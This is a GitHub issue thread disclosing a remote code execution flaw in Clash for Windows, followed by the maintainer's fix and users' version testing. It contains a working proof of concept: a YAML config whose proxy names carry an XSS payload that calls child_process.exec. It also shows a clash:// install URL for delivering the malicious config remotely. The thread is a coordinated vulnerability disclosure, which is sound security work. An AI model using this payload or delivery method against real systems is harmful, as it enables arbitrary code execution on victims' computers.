[Bug]: Remote Code Execution #2710

Closed
Anthem-whisper opened this issue Feb 23, 2022 · 30 comments

@Anthem-whisper (Author) commented Feb 23, 2022

Clash For Windows Remote Code Execution

Description

Clash For Windows is powered by Electron. If an XSS payload is in the name of a proxy, we can remotely execute any JavaScript code on the victim's computer.

Affected versions of clash_for_windows_pkg

version: 0.19.8 (there are other vulnerability triggers in version 0.19.9, it's exactly 0.19.9)

Platform: Windows

OS specifics: Windows 10

PoC

  1. Import the following clash config file:

```yaml
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
```

  2. Switch to it in "Profiles"

  3. Click the "Proxies" column (sometimes it's not necessary).

    Attention:

    • You need to make sure that the payload is displayed in the Proxies column.
    • The exploit is theoretically stable, but sometimes you may need to restart clash_for_windows_pkg and reproduce the vulnerability again.

A way to exploit

Put the evil config file on the internet and use clash:// to install it; clash_for_windows_pkg will download and switch to it automatically.

Such as:

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE

@Anthem-whisper (Author) commented Feb 23, 2022

I have sent an email with the PoC to the author's iCloud mailbox.

@Fndroid (Owner) commented Feb 24, 2022

Thank you very much, it will be fixed in the next version.

@Fndroid (Owner) commented Feb 25, 2022

Fixed/implemented in the latest release; check it out at https://github.com/Fndroid/clash_for_windows_pkg/releases

@Anthem-whisper (Author) commented Feb 25, 2022

Okay, I'll make it public now.

@DragonQuestHero commented Feb 25, 2022

@Anthem-whisper Are versions below 0.19.8 affected?

@Pain4ever commented Feb 25, 2022

Writing code on the Electron framework without enabling the sandbox, what scum (doge)

@yi-Xu-0100 (Contributor) commented Feb 25, 2022

Only 0.19.8 should be affected; it was introduced in that version.
Re-verified: 0.19.5 can reproduce the calculator launch.

@peanut996 commented Feb 25, 2022

Spectating 👀

@DragonQuestHero commented Feb 25, 2022

Damn, the lower versions are all affected too. An "airport" (subscription provider) turns straight into a zombie farm, total carnage. I'm off to scan for malware...

@54208039 commented Feb 25, 2022

Just here for the drama

@kjcxmx commented Feb 25, 2022

right

@Fndroid (Owner) commented Feb 25, 2022

> Writing code on the Electron framework without enabling the sandbox, what scum (doge)

In your view, does this XSS have anything to do with whether the sandbox is enabled? Not enabling the sandbox means it's garbage, is that it?

@Anthem-whisper (Author) commented Feb 25, 2022

I emailed the maintainer @Fndroid's iCloud mailbox; I hope a security advisory can be published on the GitHub repository.

@kotori2 commented Feb 25, 2022

> > Writing code on the Electron framework without enabling the sandbox, what scum (doge)
>
> In your view, does this XSS have anything to do with whether the sandbox is enabled? Not enabling the sandbox means it's garbage, is that it?

https://www.electronjs.org/zh/docs/latest/tutorial/sandbox

> ...Therefore, we recommend enabling renderer sandboxing in most cases, as a matter of great caution.

@LztCode commented Feb 25, 2022

Tested 0.14 and 0.18, both are affected. Is there any forced-update mechanism?

@MrChenA commented Feb 25, 2022

> 3. Click "Proxies" column (Sometimes it's not necessary.)

0.18.8 can be reproduced too.

@wjl110 commented Feb 25, 2022

Thanks, OP.

@751897386 commented Feb 25, 2022

0.19.2 works too (

@GrayXu commented Feb 25, 2022

Hoping a statement on the affected scope (version-number range?) can be published.

@Anthem-whisper (Author) commented Feb 25, 2022

> Hoping a statement on the affected scope (version-number range?) can be published.

Didn't the PoC say so? Everything at or below 0.19.8 is affected.
Other platforms weren't tested because I don't have the devices.

@ccint3cc commented Feb 25, 2022

Updated to 0.19.10; tested, not affected.

@ccint3cc commented Feb 25, 2022

0.19.8, PoC test succeeded.

@GrayXu commented Feb 25, 2022

> > Hoping a statement on the affected scope (version-number range?) can be published.
>
> Didn't the PoC say so? Everything at or below 0.19.8 is affected. Other platforms weren't tested because I don't have the devices.

Thanks

@Anthem-whisper (Author) commented Feb 25, 2022

> > > Hoping a statement on the affected scope (version-number range?) can be published.
> >
> > Didn't the PoC say so? Everything at or below 0.19.8 is affected. Other platforms weren't tested because I don't have the devices.
>
> Thanks

A correction: version 0.19.9 did not fully fix it; please update to 0.19.10.

@crazyMarky commented Feb 26, 2022

Thanks, already upgraded to the latest version.

@yu-steven commented Feb 26, 2022

Present at the scene, hugs.

@ahackingboy commented Mar 3, 2022

Good thing my intel work is solid.

@malviez commented Mar 3, 2022

Thanks, already upgraded to the latest version, hugs.

@ajfg93 commented Mar 7, 2022

Still on version 0.11.3 :)

@KonDream commented Mar 7, 2022

0.19.11
